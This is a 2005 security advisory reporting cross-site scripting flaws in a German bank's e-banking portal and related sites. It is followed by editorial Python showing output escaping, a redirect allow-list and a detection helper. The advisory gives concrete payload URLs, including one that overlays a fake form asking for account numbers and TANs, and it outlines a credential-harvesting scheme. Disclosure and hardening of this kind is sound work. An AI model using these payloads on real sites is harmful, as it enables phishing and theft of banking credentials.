
VolksbankXSS.txt

Posted Dec 28, 2005
Authored by Constantin.Hofstetter | Site consti.de

Germany's second-largest financial institution's e-banking portal (Volksbank Raiffeisenbank) suffers from several XSS vulnerabilities.

tags | advisory, vulnerability
SHA-256 | 290d5918ad1f1085432ec191baf145feb7f4fe566eb730da9139519b1239600e

I emailed the Administrators 2 months ago - the only response I got was
something like:
"We will look into it, but we may or may not change anything on the page -
who knows; we won't tell you!".
I called them and the guy on the phone laughed at me.

Here are the links / examples:

*Original:*
https://www.vr-ebanking.de/index.php?RZBK=0280 [vr-ebanking.de]
*MY Version (CSS):*
https://www.vr-ebanking.de/help;jsessionid=XA?Action=SelectMenu&SMID=EigenesOrderbuch&MenuName=&InitHref=http://www.consti.de/secure [vr-ebanking.de]
*/Fälschung --> Imitation /*
My local Bank's Website:
http://voba-lindenberg.de/content_suche.php?search=<b>Mysql_Injection?</b>'
<http://voba-lindenberg.de/content_suche.php?search=%3Cdiv%20style=z-index:2000;position:absolute;margin-top:-52>

The Institute that should secure the financial institute's websites:
http://www.fiducia.de/__C1256CF50056F303.nsf/SearchView/!SearchView&query=AA%22%3E<b>Whatever_You_Like_</b>&SearchMax=10
<http://www.fiducia.de/__C1256CF50056F303.nsf/SearchView/%21SearchView&query=AA%22%3E%3Cdiv%20style=z-index:2000;position:absolute;width:90%25;height:90%25;margin:-150px;padding:60px;background:white;%3E%3Ch1%3EKonto%20Erneuern%3C/h1%3E%3Cp%3E%3Ctable%3E%3Ctr%3E%3Ctd%3E%3Cb%3EKontonummer:%3C/b%3E%3C/td%3E%3Ctd%3E%3Cinput%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Cb%3ETAN:%3C/b%3E%3C/td%3E%3Ctd%3E%3Cinput%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Cbr%3E%3C/td%3E%3Ctd%3E%3Cinput%20type=submit%20value=Aktivieren%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3C/div%3E%3Cinput%20value=%22&SearchMax=10>

and so on..

The vr-ebanking site is used by millions of people each day for their daily
financial stuff (ebanking) - someone (phishers) could easily use the CSS
(Cross Site Scripting) to create
real-looking websites "within" the domain; more importantly they could
create a website that does all the true login stuff (in the background) but
sniffs out the TANs and PINs (think snoopy.in, think curl, think a mysql
database full of working TANs!).
This is not looking too good for my bank, but they don't listen -

--
Constantin Hofstetter
http://www.consti.de
Constantin.Hofstetter@gmail.com
mailmespam@gmail.com
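The advisory shows two defects: a search term echoed straight back into the page (the `search` and `query` parameters), and a navigation parameter (`InitHref`) that accepts an arbitrary external URL, so an attacker's page can be loaded under the bank's domain. The following Python is an added editorial example, not code from the advisory or from any of the sites it names: it places a vulnerable echo beside its output-encoded form, shows an allow-list check for a redirect/frame parameter, and includes a small detection helper for flagging percent-encoded markup in request logs. All function names, the allow-listed host and the sample query are assumptions constructed for the example.

```python
import html
from urllib.parse import urlsplit, unquote

# Constructed sample input, modelled loosely on the advisory's search-box examples.
SAMPLE_QUERY = '"><div style="position:absolute">Konto Erneuern</div>'

# Assumption: the bank's own host(s); the real list is not on the page.
ALLOWED_HOSTS = {"www.vr-ebanking.de"}


def render_results_vulnerable(query: str) -> str:
    """The defect: the reflected search term is concatenated into HTML unchanged,
    so any tags in it are parsed by the browser as part of the bank's page."""
    return f"<p>Suchergebnisse für: {query}</p>"


def render_results_hardened(query: str) -> str:
    """The fix: HTML-escape the reflected value (including quotes), so the
    browser renders it as text rather than markup."""
    return f"<p>Suchergebnisse für: {html.escape(query, quote=True)}</p>"


def safe_init_href(value: str, default: str = "/index.php") -> str:
    """Allow-list check for a redirect/frame target such as InitHref.

    Accepts only a site-relative path (not protocol-relative "//host/...")
    or an https URL whose host is allow-listed; anything else, including
    external hosts and non-http schemes, falls back to the default."""
    parts = urlsplit(value)
    if (parts.scheme == "" and parts.netloc == ""
            and value.startswith("/") and not value.startswith("//")):
        return value
    # netloc (not hostname) is compared so userinfo tricks like
    # "https://www.vr-ebanking.de@other.example/" do not match.
    if parts.scheme == "https" and parts.netloc.lower() in ALLOWED_HOSTS:
        return value
    return default


def flag_markup_in_param(raw_value: str) -> bool:
    """Detection helper for access logs or a WAF rule: True when a
    percent-encoded query parameter decodes to something containing
    HTML-significant characters. A flag, not a block: log and review."""
    decoded = unquote(raw_value)
    return any(c in decoded for c in '<>"')


if __name__ == "__main__":
    print(render_results_vulnerable(SAMPLE_QUERY))
    print(render_results_hardened(SAMPLE_QUERY))
    print(safe_init_href("http://www.consti.de/secure"))
    print(flag_markup_in_param("AA%22%3E%3Cdiv%20style%3Dz-index:2000"))
```

The escaping in `render_results_hardened` is the general fix for every reflected parameter in the advisory, not just the search box; the `safe_init_href` allow-list is the corresponding fix for the `InitHref`-style parameter, where escaping alone does not help because the value is used as a URL rather than displayed.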
